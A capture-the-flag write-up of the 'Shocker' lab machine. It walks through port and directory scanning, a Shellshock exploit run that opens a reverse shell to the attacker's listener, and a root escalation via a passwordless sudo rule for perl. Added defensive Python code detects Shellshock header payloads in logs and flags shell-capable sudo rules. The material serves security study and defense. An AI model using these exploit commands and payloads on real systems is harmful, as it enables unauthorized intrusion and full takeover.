Shocker is a relatively straightforward box that tasks the user with enumerating with NMAP and Gobuster, as well as using public exploits to compromise the target.

Step 1: Enumerating with NMAP

Our first step is to enumerate with NMAP.

➜  shocker nmap -A -vv 10.129.5.141 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-26 17:34 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:34
Completed Parallel DNS resolution of 1 host. at 17:34, 0.02s elapsed
Initiating Connect Scan at 17:34
Scanning 10.129.5.141 [1000 ports]
Discovered open port 80/tcp on 10.129.5.141
Discovered open port 2222/tcp on 10.129.5.141
Completed Connect Scan at 17:34, 0.50s elapsed (1000 total ports)
Initiating Service scan at 17:34
Scanning 2 services on 10.129.5.141
Completed Service scan at 17:34, 6.07s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.5.141.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.97s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Nmap scan report for 10.129.5.141
Host is up, received user-set (0.031s latency).
Scanned at 2023-01-26 17:34:46 EST for 8s
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:34
Completed NSE at 17:34, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

We can see that ports 80 (http) and 2222 (ssh) are open. We visited the page at http://10.129.5.141 but didn’t find much. Let’s try running a scan with gobuster to see if there are additional files and directories that we may be able to access.

Step 2: Scanning with Gobuster

We next run a scan with gobuster.

➜  shocker gobuster -w ~/Downloads/SecLists/Discovery/Web-Content/common.txt -u http://10.129.5.141            

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.5.141/
[+] Threads      : 10
[+] Wordlist     : /home/exo/Downloads/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2023/01/26 17:39:32 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
=====================================================
2023/01/26 17:39:47 Finished
=====================================================

We can’t access much of anything, but there is a directory (/cgi-bin/) that may hold additional files. Let’s run an additional scan to dive deeper into the newly found directory.

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.5.141/cgi-bin/
[+] Threads      : 10
[+] Wordlist     : /home/exo/Downloads/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : sh,txt
[+] Timeout      : 10s
=====================================================
2023/01/26 17:46:41 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.sh (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.txt (Status: 403)
/user.sh (Status: 200)
=====================================================
2023/01/26 17:47:29 Finished
=====================================================

We search the /cgi-bin/ directory for any files ending in .sh or .txt and find user.sh. Requesting http://10.129.5.141/cgi-bin/user.sh returns the following:

Content-Type: text/plain

Just an uptime test script

 17:47:29 up 22 min,  0 users,  load average: 0.13, 0.05, 0.01

There isn’t much in the file, but it may prove useful later.

Step 3: Exploiting the Shellshock Vulnerability

We searched for quite some time and were unable to find enough information to choose the correct exploit for this box, until we thought about the name of this machine. Shocker, shellshock? Could there be a connection between the name of this box and the popular exploit? Let’s try it out.

We searched Google for Shellshock exploit code and quickly found the following page: https://www.exploit-db.com/exploits/34900. It's a Python script that exploits the vulnerability and provides us with an unprivileged shell. Let's run the script and connect to the target machine.

➜  shocker python2.7 shellshock.py payload=reverse rhost=10.129.5.141 lhost=10.10.14.86 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.129.5.141
10.129.5.141> 

We are quickly dropped into a shell. Let’s see what user we are logged in as:

10.129.5.141> whoami
shelly

Great, we can grab the user flag and submit.
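From the defender's side, the request that triggered the shell above leaves a distinctive trace in the web server log: the Shellshock payload is a bash function definition, beginning with "() {", smuggled in through an HTTP header or the request line that the CGI handler copies into environment variables. The following is an added example, not part of the original writeup or the exploit-db script, that scans Apache combined-format access log lines for that pattern and reports which CGI scripts received it. The log lines are constructed for the example, and only the client address and the /cgi-bin/user.sh path come from the page.

```python
import re

# Apache "combined" log format:
# client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock trigger: a header value that starts with a bash function definition, "() {".
# Exploits vary the whitespace between the tokens, so allow any amount.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample log (not captured from the target). Lines 2-4 carry the pattern;
# line 4 hits a static page, where Apache never hands the header to bash.
SAMPLE_LOG = """\
10.10.14.86 - - [26/Jan/2023:17:47:29 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.14.86 - - [26/Jan/2023:17:50:02 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo probe"
10.10.14.86 - - [26/Jan/2023:17:50:10 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { ignored; }; echo x" "curl/7.88.1"
10.10.14.86 - - [26/Jan/2023:17:51:00 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "() { :; }; echo probe"
10.10.14.86 - - [26/Jan/2023:17:51:05 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.88.1"
"""


def parse_combined(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def request_path(request):
    """Extract the path from a request line such as 'GET /cgi-bin/user.sh HTTP/1.1'."""
    parts = request.split()
    return parts[1] if len(parts) >= 2 else request


def find_shellshock(log_text):
    """Return (client, path, field) for each line whose request line, Referer or
    User-Agent carries the function-definition prefix. One hit per line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["client"], request_path(rec["request"]), field))
                break
    return hits


def cgi_targets(hits):
    """Paths under /cgi-bin/ that received the pattern: the scripts whose environment
    actually reached bash, and therefore the ones to check for compromise first."""
    return sorted({path for _, path, _ in hits if path.startswith("/cgi-bin/")})


if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG)
    for client, path, field in found:
        print(f"shellshock pattern from {client} against {path} via {field}")
    print("CGI scripts hit:", cgi_targets(found))
```

A 200 status on the exploit request is normal, as seen in the sample: the script still runs and returns its uptime output, so status codes alone do not reveal the attempt. Matching on the header contents is what distinguishes it, and any hit against a path under /cgi-bin/ on a host running an unpatched bash should be treated as a likely compromise rather than a probe.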

Step 4: Escalating Privileges

We now need to escalate privileges. We can run sudo -l to see if we can run any commands as root.

10.129.5.141> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

We can run the perl binary as root without a password. We can check GTFOBins to see if there are any privilege escalation techniques that use the perl binary. We found the following page describing how we can escalate privileges: https://gtfobins.github.io/gtfobins/perl/. We run the following commands:

10.129.5.141> sudo perl -e 'exec "/bin/sh";'
10.129.5.141> whoami
root

We now have root access. The only remaining step is to grab and submit the root flag.
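The root cause of the escalation is a sudoers rule that lets an unprivileged user run an interpreter as root; any interpreter can spawn a shell, so the rule is equivalent to passwordless root. The following added example, not part of the original writeup, parses the output format of sudo -l shown above and flags rules whose command is an interpreter or another shell-capable binary of the kind catalogued on GTFOBins. The first rule in the sample is the one from the page; the remaining rules and the list of binaries are constructed for the example, and a real audit would read the sudoers files directly rather than sudo -l output.

```python
import os
import re

# One rule line as printed by "sudo -l": "(runas) TAG: TAG: command[, command ...]".
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s+)*)(?P<commands>\S.*)$'
)

# Binaries that give back an interactive shell or arbitrary file access when run as root.
# Constructed shortlist of well-known cases, not an exhaustive one.
SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh", "perl", "python", "python2", "python3", "ruby",
    "lua", "node", "php", "vim", "vi", "nano", "less", "more", "awk", "find", "env",
}

# Sample sudo -l output. The perl rule is the one from the box; the rest is constructed.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2, /usr/bin/systemctl reload apache2
    (ALL : ALL) NOPASSWD: /usr/bin/python3
"""


def parse_sudo_l(text):
    """Return one dict per command in the 'may run the following commands' section."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        # sudo prints several commands of one rule on a single line, comma separated.
        for command in m.group("commands").split(", "):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": command.strip(),
            })
    return rules


def risky_rules(text):
    """Rules whose command is 'ALL' or a shell-capable binary: each one is root access
    for the user, with or without a password prompt."""
    out = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["command"].split()[0])
        if rule["command"] == "ALL" or binary in SHELL_CAPABLE:
            out.append(rule)
    return out


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDO_L):
        auth = "NOPASSWD" if rule["nopasswd"] else "password required"
        print(f"({rule['runas']}) {rule['command']}: shell-capable binary, {auth}")
```

The systemctl rules are not flagged because the command is pinned to fixed arguments, which is how a sudoers entry should be written when a user genuinely needs one privileged operation. The fix for the box's rule is not to require a password for perl but to remove the rule and grant the specific command that was needed.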